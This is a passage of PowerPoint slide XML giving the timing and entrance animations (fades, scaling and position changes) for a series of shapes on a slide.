                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" nodeType="with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p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="47" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="58" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="17" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="69" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
